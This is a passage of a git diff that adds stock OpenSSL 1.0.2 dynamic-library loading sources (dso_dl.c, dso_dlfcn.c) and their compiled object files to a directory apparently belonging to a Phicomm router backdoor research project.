z@hA8*D&D;4OfuVU*Wf`1Hs8#b`DSObOYU<!TOF1K$}CuiR-{;f<Bpb}4c#mxp&vd5
zCO$LIFOc8ZSW8VGm1<R4ORb7Uk)F@2)WR@xw~!X;rJ0E4G6}>%T%EY`dq;rfpNX?^
zk&Q$E*6lu6^+9Va+1>MijS)Z2@46X(1DYiP?_Y5_cI>3ogEp)tw42>&B)WDuMLS24
z4P8IUkdN=&#!gL3A~CG>*;JkeUa{nQfhfb~L7}*tJKQd8hD=x@#f4~+wrNCgQ;|*y
zL?HbLFO(<Ux&(3RNC!kI2tbs*O2w@rSM{VT@R;TU>69-yKCjlqweMZKzPth9yH}2I
zFN$ZrQ*n9of4~@O>FmrenB|(y@4&HnXD5*-PTeO?gS>JKH1$*Xz6aM|^>e7DnrU3R
zsr_el5`DG5!ex!qQ+++qe5F%V4juYNZD)^hofA@w3TRf{PB5UFrv8zW%(+bcG3L>2
z&T_tjH*R#4iC#qNQ|T2Sw>L>%>4DaW0QwNAhN&mcJUfy+@&4)`LL3>>QGm}OTygpa
MC!RMmBgfQ#0|>@W!2kdN

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dso/dso_dl.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dso/dso_dl.c
new file mode 100644
index 0000000..0087ac5
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dso/dso_dl.c
@@ -0,0 +1,380 @@
+/* dso_dl.c -*- mode:C; c-file-style: "eay" -*- */
+/*
+ * Written by Richard Levitte (richard@levitte.org) for the OpenSSL project
+ * 2000.
+ */
+/* ====================================================================
+ * Copyright (c) 2000 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/dso.h>
+
+#ifndef DSO_DL
+DSO_METHOD *DSO_METHOD_dl(void)
+{
+    return NULL;
+}
+#else
+
+# include <dl.h>
+
+/* Part of the hack in "dl_load" ... */
+# define DSO_MAX_TRANSLATED_SIZE 256
+
+static int dl_load(DSO *dso);
+static int dl_unload(DSO *dso);
+static void *dl_bind_var(DSO *dso, const char *symname);
+static DSO_FUNC_TYPE dl_bind_func(DSO *dso, const char *symname);
+# if 0
+static int dl_unbind_var(DSO *dso, char *symname, void *symptr);
+static int dl_unbind_func(DSO *dso, char *symname, DSO_FUNC_TYPE symptr);
+static int dl_init(DSO *dso);
+static int dl_finish(DSO *dso);
+static int dl_ctrl(DSO *dso, int cmd, long larg, void *parg);
+# endif
+static char *dl_name_converter(DSO *dso, const char *filename);
+static char *dl_merger(DSO *dso, const char *filespec1,
+                       const char *filespec2);
+static int dl_pathbyaddr(void *addr, char *path, int sz);
+static void *dl_globallookup(const char *name);
+
+static DSO_METHOD dso_meth_dl = {
+    "OpenSSL 'dl' shared library method",
+    dl_load,
+    dl_unload,
+    dl_bind_var,
+    dl_bind_func,
+/* For now, "unbind" doesn't exist */
+# if 0
+    NULL,                       /* unbind_var */
+    NULL,                       /* unbind_func */
+# endif
+    NULL,                       /* ctrl */
+    dl_name_converter,
+    dl_merger,
+    NULL,                       /* init */
+    NULL,                       /* finish */
+    dl_pathbyaddr,
+    dl_globallookup
+};
+
+DSO_METHOD *DSO_METHOD_dl(void)
+{
+    return (&dso_meth_dl);
+}
+
+/*
+ * For this DSO_METHOD, our meth_data STACK will contain; (i) the handle
+ * (shl_t) returned from shl_load(). NB: I checked on HPUX11 and shl_t is
+ * itself a pointer type so the cast is safe.
+ */
+
+static int dl_load(DSO *dso)
+{
+    shl_t ptr = NULL;
+    /*
+     * We don't do any fancy retries or anything, just take the method's (or
+     * DSO's if it has the callback set) best translation of the
+     * platform-independant filename and try once with that.
+     */
+    char *filename = DSO_convert_filename(dso, NULL);
+
+    if (filename == NULL) {
+        DSOerr(DSO_F_DL_LOAD, DSO_R_NO_FILENAME);
+        goto err;
+    }
+    ptr = shl_load(filename, BIND_IMMEDIATE |
+                   (dso->flags & DSO_FLAG_NO_NAME_TRANSLATION ? 0 :
+                    DYNAMIC_PATH), 0L);
+    if (ptr == NULL) {
+        DSOerr(DSO_F_DL_LOAD, DSO_R_LOAD_FAILED);
+        ERR_add_error_data(4, "filename(", filename, "): ", strerror(errno));
+        goto err;
+    }
+    if (!sk_push(dso->meth_data, (char *)ptr)) {
+        DSOerr(DSO_F_DL_LOAD, DSO_R_STACK_ERROR);
+        goto err;
+    }
+    /*
+     * Success, stick the converted filename we've loaded under into the DSO
+     * (it also serves as the indicator that we are currently loaded).
+     */
+    dso->loaded_filename = filename;
+    return (1);
+ err:
+    /* Cleanup! */
+    if (filename != NULL)
+        OPENSSL_free(filename);
+    if (ptr != NULL)
+        shl_unload(ptr);
+    return (0);
+}
+
+static int dl_unload(DSO *dso)
+{
+    shl_t ptr;
+    if (dso == NULL) {
+        DSOerr(DSO_F_DL_UNLOAD, ERR_R_PASSED_NULL_PARAMETER);
+        return (0);
+    }
+    if (sk_num(dso->meth_data) < 1)
+        return (1);
+    /* Is this statement legal? */
+    ptr = (shl_t) sk_pop(dso->meth_data);
+    if (ptr == NULL) {
+        DSOerr(DSO_F_DL_UNLOAD, DSO_R_NULL_HANDLE);
+        /*
+         * Should push the value back onto the stack in case of a retry.
+         */
+        sk_push(dso->meth_data, (char *)ptr);
+        return (0);
+    }
+    shl_unload(ptr);
+    return (1);
+}
+
+static void *dl_bind_var(DSO *dso, const char *symname)
+{
+    shl_t ptr;
+    void *sym;
+
+    if ((dso == NULL) || (symname == NULL)) {
+        DSOerr(DSO_F_DL_BIND_VAR, ERR_R_PASSED_NULL_PARAMETER);
+        return (NULL);
+    }
+    if (sk_num(dso->meth_data) < 1) {
+        DSOerr(DSO_F_DL_BIND_VAR, DSO_R_STACK_ERROR);
+        return (NULL);
+    }
+    ptr = (shl_t) sk_value(dso->meth_data, sk_num(dso->meth_data) - 1);
+    if (ptr == NULL) {
+        DSOerr(DSO_F_DL_BIND_VAR, DSO_R_NULL_HANDLE);
+        return (NULL);
+    }
+    if (shl_findsym(&ptr, symname, TYPE_UNDEFINED, &sym) < 0) {
+        DSOerr(DSO_F_DL_BIND_VAR, DSO_R_SYM_FAILURE);
+        ERR_add_error_data(4, "symname(", symname, "): ", strerror(errno));
+        return (NULL);
+    }
+    return (sym);
+}
+
+static DSO_FUNC_TYPE dl_bind_func(DSO *dso, const char *symname)
+{
+    shl_t ptr;
+    void *sym;
+
+    if ((dso == NULL) || (symname == NULL)) {
+        DSOerr(DSO_F_DL_BIND_FUNC, ERR_R_PASSED_NULL_PARAMETER);
+        return (NULL);
+    }
+    if (sk_num(dso->meth_data) < 1) {
+        DSOerr(DSO_F_DL_BIND_FUNC, DSO_R_STACK_ERROR);
+        return (NULL);
+    }
+    ptr = (shl_t) sk_value(dso->meth_data, sk_num(dso->meth_data) - 1);
+    if (ptr == NULL) {
+        DSOerr(DSO_F_DL_BIND_FUNC, DSO_R_NULL_HANDLE);
+        return (NULL);
+    }
+    if (shl_findsym(&ptr, symname, TYPE_UNDEFINED, &sym) < 0) {
+        DSOerr(DSO_F_DL_BIND_FUNC, DSO_R_SYM_FAILURE);
+        ERR_add_error_data(4, "symname(", symname, "): ", strerror(errno));
+        return (NULL);
+    }
+    return ((DSO_FUNC_TYPE)sym);
+}
+
+static char *dl_merger(DSO *dso, const char *filespec1, const char *filespec2)
+{
+    char *merged;
+
+    if (!filespec1 && !filespec2) {
+        DSOerr(DSO_F_DL_MERGER, ERR_R_PASSED_NULL_PARAMETER);
+        return (NULL);
+    }
+    /*
+     * If the first file specification is a rooted path, it rules. same goes
+     * if the second file specification is missing.
+     */
+    if (!filespec2 || filespec1[0] == '/') {
+        merged = OPENSSL_malloc(strlen(filespec1) + 1);
+        if (!merged) {
+            DSOerr(DSO_F_DL_MERGER, ERR_R_MALLOC_FAILURE);
+            return (NULL);
+        }
+        strcpy(merged, filespec1);
+    }
+    /*
+     * If the first file specification is missing, the second one rules.
+     */
+    else if (!filespec1) {
+        merged = OPENSSL_malloc(strlen(filespec2) + 1);
+        if (!merged) {
+            DSOerr(DSO_F_DL_MERGER, ERR_R_MALLOC_FAILURE);
+            return (NULL);
+        }
+        strcpy(merged, filespec2);
+    } else
+        /*
+         * This part isn't as trivial as it looks.  It assumes that the
+         * second file specification really is a directory, and makes no
+         * checks whatsoever.  Therefore, the result becomes the
+         * concatenation of filespec2 followed by a slash followed by
+         * filespec1.
+         */
+    {
+        int spec2len, len;
+
+        spec2len = (filespec2 ? strlen(filespec2) : 0);
+        len = spec2len + (filespec1 ? strlen(filespec1) : 0);
+
+        if (filespec2 && filespec2[spec2len - 1] == '/') {
+            spec2len--;
+            len--;
+        }
+        merged = OPENSSL_malloc(len + 2);
+        if (!merged) {
+            DSOerr(DSO_F_DL_MERGER, ERR_R_MALLOC_FAILURE);
+            return (NULL);
+        }
+        strcpy(merged, filespec2);
+        merged[spec2len] = '/';
+        strcpy(&merged[spec2len + 1], filespec1);
+    }
+    return (merged);
+}
+
+/*
+ * This function is identical to the one in dso_dlfcn.c, but as it is highly
+ * unlikely that both the "dl" *and* "dlfcn" variants are being compiled at
+ * the same time, there's no great duplicating the code. Figuring out an
+ * elegant way to share one copy of the code would be more difficult and
+ * would not leave the implementations independant.
+ */
+# if defined(__hpux)
+static const char extension[] = ".sl";
+# else
+static const char extension[] = ".so";
+# endif
+static char *dl_name_converter(DSO *dso, const char *filename)
+{
+    char *translated;
+    int len, rsize, transform;
+
+    len = strlen(filename);
+    rsize = len + 1;
+    transform = (strstr(filename, "/") == NULL);
+    {
+        /* We will convert this to "%s.s?" or "lib%s.s?" */
+        rsize += strlen(extension); /* The length of ".s?" */
+        if ((DSO_flags(dso) & DSO_FLAG_NAME_TRANSLATION_EXT_ONLY) == 0)
+            rsize += 3;         /* The length of "lib" */
+    }
+    translated = OPENSSL_malloc(rsize);
+    if (translated == NULL) {
+        DSOerr(DSO_F_DL_NAME_CONVERTER, DSO_R_NAME_TRANSLATION_FAILED);
+        return (NULL);
+    }
+    if (transform) {
+        if ((DSO_flags(dso) & DSO_FLAG_NAME_TRANSLATION_EXT_ONLY) == 0)
+            sprintf(translated, "lib%s%s", filename, extension);
+        else
+            sprintf(translated, "%s%s", filename, extension);
+    } else
+        sprintf(translated, "%s", filename);
+    return (translated);
+}
+
+static int dl_pathbyaddr(void *addr, char *path, int sz)
+{
+    struct shl_descriptor inf;
+    int i, len;
+
+    if (addr == NULL) {
+        union {
+            int (*f) (void *, char *, int);
+            void *p;
+        } t = {
+            dl_pathbyaddr
+        };
+        addr = t.p;
+    }
+
+    for (i = -1; shl_get_r(i, &inf) == 0; i++) {
+        if (((size_t)addr >= inf.tstart && (size_t)addr < inf.tend) ||
+            ((size_t)addr >= inf.dstart && (size_t)addr < inf.dend)) {
+            len = (int)strlen(inf.filename);
+            if (sz <= 0)
+                return len + 1;
+            if (len >= sz)
+                len = sz - 1;
+            memcpy(path, inf.filename, len);
+            path[len++] = 0;
+            return len;
+        }
+    }
+
+    return -1;
+}
+
+static void *dl_globallookup(const char *name)
+{
+    void *ret;
+    shl_t h = NULL;
+
+    return shl_findsym(&h, name, TYPE_UNDEFINED, &ret) ? NULL : ret;
+}
+#endif                          /* DSO_DL */
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dso/dso_dl.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dso/dso_dl.o
new file mode 100644
index 0000000000000000000000000000000000000000..bf6c7f59c20939e9968891ff25e03735276b4ce2
GIT binary patch
literal 1360
zcmbtTJ4*vW5T48Vh#K&Lg%FWgsc4qO2cm@pVvL0vQ3Ey-F3FjI=E2<t5)1tcmi`pW
zfQ_X;!&0%c(V5(CvRMxc9oYM3zMXG&=JxI`b+8vO43K8P4)h|)0vrc=exl<hAOvIZ
zF+TShZ$CjgncR*nX7i0IZ$!4(8jD5an~hEwzg>;7*!q%3i!uX<6SxL(rH`_J<=e!W
zxX7kG0ORHajOK(94h;wIu`%Lj#on;M-+*QrfcG!I9MgAF>OmP+5t`lZ6cSytGeti~
zkqJXT$qw(|xrv?XHj2cQ(q~s$bZfcdH7mgGX(o4=I@{0eVhj;cfF|ghg1M~<xAMST
z?s!<19=DquSkdAZu)OO6E7U3#yNX=3#%+ez6Lq;&xDs)x+F*63R<|AA0_ND)7PHH_
zOUJ6%;_!b!7`1d~`kPCLn%((DOu4GfV?dnzj^tiiIvVQw1>6tf`m25gwNx{POEr1^
zvPz;a&zHENaB8Zf28u6rl1iaN@2KzYF>Z>4h(HN6t7;b*P)%L`Ad>XCbp1Kz(N~-h
z`4V14qcegSL8LyVUh;ltljNBmXm1_>{TEb2*Au7T9Z4Rw^NAx9v=`uW5|^L;RV0?W
JnVzHTzX8=YOz{8!

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dso/dso_dlfcn.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dso/dso_dlfcn.c
new file mode 100644
index 0000000..c0fcbb1
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dso/dso_dlfcn.c
@@ -0,0 +1,466 @@
+/* dso_dlfcn.c -*- mode:C; c-file-style: "eay" -*- */
+/*
+ * Written by Geoff Thorpe (geoff@geoffthorpe.net) for the OpenSSL project
+ * 2000.
+ */
+/* ====================================================================
+ * Copyright (c) 2000 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+/*
+ * We need to do this early, because stdio.h includes the header files that
+ * handle _GNU_SOURCE and other similar macros.  Defining it later is simply
+ * too late, because those headers are protected from re- inclusion.
+ */
+#ifndef _GNU_SOURCE
+# define _GNU_SOURCE            /* make sure dladdr is declared */
+#endif
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/dso.h>
+
+#ifndef DSO_DLFCN
+DSO_METHOD *DSO_METHOD_dlfcn(void)
+{
+    return NULL;
+}
+#else
+
+# ifdef HAVE_DLFCN_H
+#  ifdef __osf__
+#   define __EXTENSIONS__
+#  endif
+#  include <dlfcn.h>
+#  define HAVE_DLINFO 1
+#  if defined(_AIX) || defined(__CYGWIN__) || \
+     defined(__SCO_VERSION__) || defined(_SCO_ELF) || \
+     (defined(__osf__) && !defined(RTLD_NEXT))     || \
+     (defined(__OpenBSD__) && !defined(RTLD_SELF)) || \
+        defined(__ANDROID__)
+#   undef HAVE_DLINFO
+#  endif
+# endif
+
+/* Part of the hack in "dlfcn_load" ... */
+# define DSO_MAX_TRANSLATED_SIZE 256
+
+static int dlfcn_load(DSO *dso);
+static int dlfcn_unload(DSO *dso);
+static void *dlfcn_bind_var(DSO *dso, const char *symname);
+static DSO_FUNC_TYPE dlfcn_bind_func(DSO *dso, const char *symname);
+# if 0
+static int dlfcn_unbind(DSO *dso, char *symname, void *symptr);
+static int dlfcn_init(DSO *dso);
+static int dlfcn_finish(DSO *dso);
+static long dlfcn_ctrl(DSO *dso, int cmd, long larg, void *parg);
+# endif
+static char *dlfcn_name_converter(DSO *dso, const char *filename);
+static char *dlfcn_merger(DSO *dso, const char *filespec1,
+                          const char *filespec2);
+static int dlfcn_pathbyaddr(void *addr, char *path, int sz);
+static void *dlfcn_globallookup(const char *name);
+
+static DSO_METHOD dso_meth_dlfcn = {
+    "OpenSSL 'dlfcn' shared library method",
+    dlfcn_load,
+    dlfcn_unload,
+    dlfcn_bind_var,
+    dlfcn_bind_func,
+/* For now, "unbind" doesn't exist */
+# if 0
+    NULL,                       /* unbind_var */
+    NULL,                       /* unbind_func */
+# endif
+    NULL,                       /* ctrl */
+    dlfcn_name_converter,
+    dlfcn_merger,
+    NULL,                       /* init */
+    NULL,                       /* finish */
+    dlfcn_pathbyaddr,
+    dlfcn_globallookup
+};
+
+DSO_METHOD *DSO_METHOD_dlfcn(void)
+{
+    return (&dso_meth_dlfcn);
+}
+
+/*
+ * Prior to using the dlopen() function, we should decide on the flag we
+ * send. There's a few different ways of doing this and it's a messy
+ * venn-diagram to match up which platforms support what. So as we don't have
+ * autoconf yet, I'm implementing a hack that could be hacked further
+ * relatively easily to deal with cases as we find them. Initially this is to
+ * cope with OpenBSD.
+ */
+# if defined(__OpenBSD__) || defined(__NetBSD__)
+#  ifdef DL_LAZY
+#   define DLOPEN_FLAG DL_LAZY
+#  else
+#   ifdef RTLD_NOW
+#    define DLOPEN_FLAG RTLD_NOW
+#   else
+#    define DLOPEN_FLAG 0
+#   endif
+#  endif
+# else
+#  ifdef OPENSSL_SYS_SUNOS
+#   define DLOPEN_FLAG 1
+#  else
+#   define DLOPEN_FLAG RTLD_NOW /* Hope this works everywhere else */
+#  endif
+# endif
+
+/*
+ * For this DSO_METHOD, our meth_data STACK will contain; (i) the handle
+ * (void*) returned from dlopen().
+ */
+
+static int dlfcn_load(DSO *dso)
+{
+    void *ptr = NULL;
+    /* See applicable comments in dso_dl.c */
+    char *filename = DSO_convert_filename(dso, NULL);
+    int flags = DLOPEN_FLAG;
+
+    if (filename == NULL) {
+        DSOerr(DSO_F_DLFCN_LOAD, DSO_R_NO_FILENAME);
+        goto err;
+    }
+# ifdef RTLD_GLOBAL
+    if (dso->flags & DSO_FLAG_GLOBAL_SYMBOLS)
+        flags |= RTLD_GLOBAL;
+# endif
+    ptr = dlopen(filename, flags);
+    if (ptr == NULL) {
+        DSOerr(DSO_F_DLFCN_LOAD, DSO_R_LOAD_FAILED);
+        ERR_add_error_data(4, "filename(", filename, "): ", dlerror());
+        goto err;
+    }
+    if (!sk_void_push(dso->meth_data, (char *)ptr)) {
+        DSOerr(DSO_F_DLFCN_LOAD, DSO_R_STACK_ERROR);
+        goto err;
+    }
+    /* Success */
+    dso->loaded_filename = filename;
+    return (1);
+ err:
+    /* Cleanup! */
+    if (filename != NULL)
+        OPENSSL_free(filename);
+    if (ptr != NULL)
+        dlclose(ptr);
+    return (0);
+}
+
+static int dlfcn_unload(DSO *dso)
+{
+    void *ptr;
+    if (dso == NULL) {
+        DSOerr(DSO_F_DLFCN_UNLOAD, ERR_R_PASSED_NULL_PARAMETER);
+        return (0);
+    }
+    if (sk_void_num(dso->meth_data) < 1)
+        return (1);
+    ptr = sk_void_pop(dso->meth_data);
+    if (ptr == NULL) {
+        DSOerr(DSO_F_DLFCN_UNLOAD, DSO_R_NULL_HANDLE);
+        /*
+         * Should push the value back onto the stack in case of a retry.
+         */
+        sk_void_push(dso->meth_data, ptr);
+        return (0);
+    }
+    /* For now I'm not aware of any errors associated with dlclose() */
+    dlclose(ptr);
+    return (1);
+}
+
+static void *dlfcn_bind_var(DSO *dso, const char *symname)
+{
+    void *ptr, *sym;
+
+    if ((dso == NULL) || (symname == NULL)) {
+        DSOerr(DSO_F_DLFCN_BIND_VAR, ERR_R_PASSED_NULL_PARAMETER);
+        return (NULL);
+    }
+    if (sk_void_num(dso->meth_data) < 1) {
+        DSOerr(DSO_F_DLFCN_BIND_VAR, DSO_R_STACK_ERROR);
+        return (NULL);
+    }
+    ptr = sk_void_value(dso->meth_data, sk_void_num(dso->meth_data) - 1);
+    if (ptr == NULL) {
+        DSOerr(DSO_F_DLFCN_BIND_VAR, DSO_R_NULL_HANDLE);
+        return (NULL);
+    }
+    sym = dlsym(ptr, symname);
+    if (sym == NULL) {
+        DSOerr(DSO_F_DLFCN_BIND_VAR, DSO_R_SYM_FAILURE);
+        ERR_add_error_data(4, "symname(", symname, "): ", dlerror());
+        return (NULL);
+    }
+    return (sym);
+}
+
+static DSO_FUNC_TYPE dlfcn_bind_func(DSO *dso, const char *symname)
+{
+    void *ptr;
+    union {
+        DSO_FUNC_TYPE sym;
+        void *dlret;
+    } u;
+
+    if ((dso == NULL) || (symname == NULL)) {
+        DSOerr(DSO_F_DLFCN_BIND_FUNC, ERR_R_PASSED_NULL_PARAMETER);
+        return (NULL);
+    }
+    if (sk_void_num(dso->meth_data) < 1) {
+        DSOerr(DSO_F_DLFCN_BIND_FUNC, DSO_R_STACK_ERROR);
+        return (NULL);
+    }
+    ptr = sk_void_value(dso->meth_data, sk_void_num(dso->meth_data) - 1);
+    if (ptr == NULL) {
+        DSOerr(DSO_F_DLFCN_BIND_FUNC, DSO_R_NULL_HANDLE);
+        return (NULL);
+    }
+    u.dlret = dlsym(ptr, symname);
+    if (u.dlret == NULL) {
+        DSOerr(DSO_F_DLFCN_BIND_FUNC, DSO_R_SYM_FAILURE);
+        ERR_add_error_data(4, "symname(", symname, "): ", dlerror());
+        return (NULL);
+    }
+    return u.sym;
+}
+
+static char *dlfcn_merger(DSO *dso, const char *filespec1,
+                          const char *filespec2)
+{
+    char *merged;
+
+    if (!filespec1 && !filespec2) {
+        DSOerr(DSO_F_DLFCN_MERGER, ERR_R_PASSED_NULL_PARAMETER);
+        return (NULL);
+    }
+    /*
+     * If the first file specification is a rooted path, it rules. same goes
+     * if the second file specification is missing.
+     */
+    if (!filespec2 || (filespec1 != NULL && filespec1[0] == '/')) {
+        merged = OPENSSL_malloc(strlen(filespec1) + 1);
+        if (!merged) {
+            DSOerr(DSO_F_DLFCN_MERGER, ERR_R_MALLOC_FAILURE);
+            return (NULL);
+        }
+        strcpy(merged, filespec1);
+    }
+    /*
+     * If the first file specification is missing, the second one rules.
+     */
+    else if (!filespec1) {
+        merged = OPENSSL_malloc(strlen(filespec2) + 1);
+        if (!merged) {
+            DSOerr(DSO_F_DLFCN_MERGER, ERR_R_MALLOC_FAILURE);
+            return (NULL);
+        }
+        strcpy(merged, filespec2);
+    } else
+        /*
+         * This part isn't as trivial as it looks.  It assumes that the
+         * second file specification really is a directory, and makes no
+         * checks whatsoever.  Therefore, the result becomes the
+         * concatenation of filespec2 followed by a slash followed by
+         * filespec1.
+         */
+    {
+        int spec2len, len;
+
+        spec2len = strlen(filespec2);
+        len = spec2len + (filespec1 ? strlen(filespec1) : 0);
+
+        if (filespec2 && filespec2[spec2len - 1] == '/') {
+            spec2len--;
+            len--;
+        }
+        merged = OPENSSL_malloc(len + 2);
+        if (!merged) {
+            DSOerr(DSO_F_DLFCN_MERGER, ERR_R_MALLOC_FAILURE);
+            return (NULL);
+        }
+        strcpy(merged, filespec2);
+        merged[spec2len] = '/';
+        strcpy(&merged[spec2len + 1], filespec1);
+    }
+    return (merged);
+}
+
+# ifdef OPENSSL_SYS_MACOSX
+#  define DSO_ext ".dylib"
+#  define DSO_extlen 6
+# else
+#  define DSO_ext ".so"
+#  define DSO_extlen 3
+# endif
+
+static char *dlfcn_name_converter(DSO *dso, const char *filename)
+{
+    char *translated;
+    int len, rsize, transform;
+
+    len = strlen(filename);
+    rsize = len + 1;
+    transform = (strstr(filename, "/") == NULL);
+    if (transform) {
+        /* We will convert this to "%s.so" or "lib%s.so" etc */
+        rsize += DSO_extlen;    /* The length of ".so" */
+        if ((DSO_flags(dso) & DSO_FLAG_NAME_TRANSLATION_EXT_ONLY) == 0)
+            rsize += 3;         /* The length of "lib" */
+    }
+    translated = OPENSSL_malloc(rsize);
+    if (translated == NULL) {
+        DSOerr(DSO_F_DLFCN_NAME_CONVERTER, DSO_R_NAME_TRANSLATION_FAILED);
+        return (NULL);
+    }
+    if (transform) {
+        if ((DSO_flags(dso) & DSO_FLAG_NAME_TRANSLATION_EXT_ONLY) == 0)
+            sprintf(translated, "lib%s" DSO_ext, filename);
+        else
+            sprintf(translated, "%s" DSO_ext, filename);
+    } else
+        sprintf(translated, "%s", filename);
+    return (translated);
+}
+
+# ifdef __sgi
+/*-
+This is a quote from IRIX manual for dladdr(3c):
+
+     <dlfcn.h> does not contain a prototype for dladdr or definition of
+     Dl_info.  The #include <dlfcn.h>  in the SYNOPSIS line is traditional,
+     but contains no dladdr prototype and no IRIX library contains an
+     implementation.  Write your own declaration based on the code below.
+
+     The following code is dependent on internal interfaces that are not
+     part of the IRIX compatibility guarantee; however, there is no future
+     intention to change this interface, so on a practical level, the code
+     below is safe to use on IRIX.
+*/
+#  include <rld_interface.h>
+#  ifndef _RLD_INTERFACE_DLFCN_H_DLADDR
+#   define _RLD_INTERFACE_DLFCN_H_DLADDR
+typedef struct Dl_info {
+    const char *dli_fname;
+    void *dli_fbase;
+    const char *dli_sname;
+    void *dli_saddr;
+    int dli_version;
+    int dli_reserved1;
+    long dli_reserved[4];
+} Dl_info;
+#  else
+typedef struct Dl_info Dl_info;
+#  endif
+#  define _RLD_DLADDR             14
+
+static int dladdr(void *address, Dl_info *dl)
+{
+    void *v;
+    v = _rld_new_interface(_RLD_DLADDR, address, dl);
+    return (int)v;
+}
+# endif                         /* __sgi */
+
+static int dlfcn_pathbyaddr(void *addr, char *path, int sz)
+{
+# ifdef HAVE_DLINFO
+    Dl_info dli;
+    int len;
+
+    if (addr == NULL) {
+        union {
+            int (*f) (void *, char *, int);
+            void *p;
+        } t = {
+            dlfcn_pathbyaddr
+        };
+        addr = t.p;
+    }
+
